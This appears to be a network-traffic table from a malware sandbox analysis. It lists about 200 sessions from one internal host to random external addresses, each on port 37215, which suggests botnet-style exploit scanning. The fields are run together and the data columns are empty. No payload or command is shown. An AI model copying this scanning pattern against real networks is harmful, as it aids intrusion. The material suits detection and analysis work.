                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24990192.168.2.1540816197.63.240.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24991192.168.2.1552504197.235.237.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24992192.168.2.1543416197.164.174.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24993192.168.2.1548968197.224.158.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24994192.168.2.1546056197.130.130.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24995192.168.2.1545570197.101.25.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24996192.168.2.1537970197.9.244.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24997192.168.2.1539740197.200.219.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24998192.168.2.1559696197.37.61.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24999192.168.2.1538028197.233.210.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25000192.168.2.1555408197.46.103.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25001192.168.2.1559772197.79.206.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25002192.168.2.1545460197.142.14.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25003192.168.2.1549130197.117.95.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25004192.168.2.1555366197.180.57.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25005192.168.2.1553732197.78.196.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25006192.168.2.1540944197.126.190.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25007192.168.2.1543366197.15.7.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25008192.168.2.1553334197.134.164.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25009192.168.2.1555944197.237.236.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25010192.168.2.1550428197.26.158.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25011192.168.2.1539058197.1.120.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25012192.168.2.1558692197.14.126.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25013192.168.2.1547052197.213.122.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25014192.168.2.1557830197.131.254.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25015192.168.2.1539806197.35.105.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25016192.168.2.1536594197.255.39.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25017192.168.2.1539766197.51.116.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25018192.168.2.1534404197.154.51.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25019192.168.2.1558828197.163.194.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25020192.168.2.1541904197.248.13.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25021192.168.2.1542562197.29.139.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25022192.168.2.1548370197.7.81.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25023192.168.2.1550634197.51.153.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25024192.168.2.1553702197.247.182.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25025192.168.2.1534308197.219.12.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25026192.168.2.1548412197.54.185.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25027192.168.2.1543688197.59.132.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25028192.168.2.1556246197.213.112.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25029192.168.2.1554920197.51.111.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25030192.168.2.1547862197.248.254.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25031192.168.2.1542018197.38.99.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25032192.168.2.1546418197.117.100.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25033192.168.2.1550488197.77.127.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25034192.168.2.1540244197.197.127.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25035192.168.2.1560722197.245.3.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25036192.168.2.1557360197.20.53.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25037192.168.2.1549694197.29.92.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25038192.168.2.1554118197.238.142.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25039192.168.2.1547884197.108.168.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25040192.168.2.1534778197.146.209.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25041192.168.2.1539074197.119.146.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25042192.168.2.1558240197.223.114.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25043192.168.2.1558370197.198.167.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25044192.168.2.1533028197.121.128.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25045192.168.2.1534142197.34.175.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25046192.168.2.1556222197.159.226.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25047192.168.2.1537246197.47.250.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25048192.168.2.1536948197.185.138.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25049192.168.2.1538482197.118.195.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25050192.168.2.1539916197.39.31.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25051192.168.2.1534838197.229.208.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25052192.168.2.1554290197.174.248.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25053192.168.2.1542332197.152.138.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25054192.168.2.1542852197.46.114.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25055192.168.2.1534158197.180.94.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25056192.168.2.1535486197.202.195.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25057192.168.2.1560572197.35.71.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25058192.168.2.1554222197.0.233.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25059192.168.2.1546164197.99.65.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25060192.168.2.1552704197.1.2.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25061192.168.2.1553922197.0.10.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25062192.168.2.1533380197.125.112.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25063192.168.2.1537822197.177.120.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25064192.168.2.1541432197.50.184.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25065192.168.2.1559070197.1.90.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25066192.168.2.1557760197.12.5.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25067192.168.2.1550780197.40.147.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25068192.168.2.1545924197.165.168.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25069192.168.2.1555178197.5.152.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25070192.168.2.1532920197.229.45.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25071192.168.2.1548864197.108.192.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25072192.168.2.1540532197.101.230.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25073192.168.2.1545322197.71.227.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25074192.168.2.1534168197.201.130.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25075192.168.2.1559230197.148.116.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25076192.168.2.1536540197.65.206.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25077192.168.2.1557378197.123.78.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25078192.168.2.1533384197.167.162.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25079192.168.2.1552788197.124.171.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25080192.168.2.1540318197.126.229.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25081192.168.2.1556036197.198.34.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25082192.168.2.1535482197.69.213.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25083192.168.2.1534056197.236.1.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25084192.168.2.1536526197.8.253.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25085192.168.2.1551574197.72.66.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25086192.168.2.1545760197.130.75.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25087192.168.2.1554768197.128.113.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25088192.168.2.1547874197.12.173.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25089192.168.2.1547700197.83.195.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25090192.168.2.1539806197.65.213.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25091192.168.2.1537788197.48.60.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25092192.168.2.1547184197.128.180.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25093192.168.2.1545144197.16.235.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25094192.168.2.1555136197.89.5.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25095192.168.2.1547958197.192.126.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25096192.168.2.1545108197.122.36.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25097192.168.2.1543450197.189.0.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25098192.168.2.1549254197.168.28.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25099192.168.2.1547920156.181.148.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25100192.168.2.1545660156.117.27.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25101192.168.2.1540492156.44.58.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25102192.168.2.1559050156.63.66.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25103192.168.2.1535638156.157.7.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25104192.168.2.1549812156.144.56.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25105192.168.2.1548648156.180.52.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25106192.168.2.1535140156.250.15.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25107192.168.2.1535182156.102.138.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25108192.168.2.1548582156.67.28.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25109192.168.2.1554556156.235.143.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25110192.168.2.1558260156.119.191.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25111192.168.2.1551756156.76.200.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25112192.168.2.1554308156.173.83.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25113192.168.2.1550638156.199.105.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25114192.168.2.1549020156.224.104.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25115192.168.2.1555512156.166.230.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25116192.168.2.1554976156.113.112.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25117192.168.2.1551234156.134.234.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25118192.168.2.1541398156.193.18.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25119192.168.2.1555398156.224.44.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25120192.168.2.1549274156.202.204.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25121192.168.2.1552924156.125.49.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25122192.168.2.1545828156.58.187.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25123192.168.2.1560386156.105.32.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25124192.168.2.1540278156.66.233.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25125192.168.2.1552240156.55.123.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25126192.168.2.1559548156.60.206.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25127192.168.2.1534360156.249.220.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25128192.168.2.1540332156.118.30.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25129192.168.2.1538982156.167.234.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25130192.168.2.1553402156.245.4.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25131192.168.2.1555514156.53.162.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25132192.168.2.1545820156.177.171.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25133192.168.2.1541894156.47.234.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25134192.168.2.1542198156.61.187.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25135192.168.2.1553988156.224.205.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25136192.168.2.1536766156.196.72.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25137192.168.2.1538574156.243.136.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25138192.168.2.1557166156.92.77.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25139192.168.2.1548162156.190.25.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25140192.168.2.1548046156.171.171.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25141192.168.2.1550468156.255.213.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25142192.168.2.1554486156.91.97.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25143192.168.2.1555258156.125.70.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25144192.168.2.1544918156.86.28.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25145192.168.2.1558026156.19.201.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25146192.168.2.1558028156.153.166.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25147192.168.2.1537038156.53.52.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25148192.168.2.1537978156.109.157.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25149192.168.2.1547604156.38.224.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25150192.168.2.1550052156.47.96.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25151192.168.2.1540738156.168.16.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25152192.168.2.1534206156.148.86.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25153192.168.2.1533622156.169.108.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25154192.168.2.1553678156.138.34.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25155192.168.2.1536264156.11.6.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25156192.168.2.1548192156.160.87.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25157192.168.2.1557896156.191.18.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25158192.168.2.1535118156.13.171.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25159192.168.2.1558564156.83.0.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25160192.168.2.1545310156.148.187.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25161192.168.2.1549084156.157.78.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25162192.168.2.1535080156.105.57.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25163192.168.2.1555614156.141.55.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25164192.168.2.1544512156.237.235.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25165192.168.2.1546340156.32.70.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25166192.168.2.1557304156.98.56.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25167192.168.2.1538264156.52.84.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25168192.168.2.1542424156.212.213.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25169192.168.2.1550166156.177.107.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25170192.168.2.1552202156.187.228.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25171192.168.2.1550814156.140.13.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25172192.168.2.1550814156.253.194.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25173192.168.2.1550368156.153.129.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25174192.168.2.1546626156.203.84.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25175192.168.2.1558312156.4.46.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25176192.168.2.1560218156.59.125.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25177192.168.2.1558970156.243.180.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25178192.168.2.1537558156.66.101.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25179192.168.2.1534428156.153.13.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25180192.168.2.1549744156.192.194.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25181192.168.2.1536380156.174.169.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25182192.168.2.1549172156.242.188.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25183192.168.2.1551624156.133.189.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25184192.168.2.1542468156.131.174.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25185192.168.2.1551540156.24.16.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25186192.168.2.1548396156.163.82.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25187192.168.2.1546522156.212.228.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25188192.168.2.1551272156.107.78.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            25189192.168.2.1546292156.192.49.17837215
                                                                            TimestampBytes transferredDirectionData


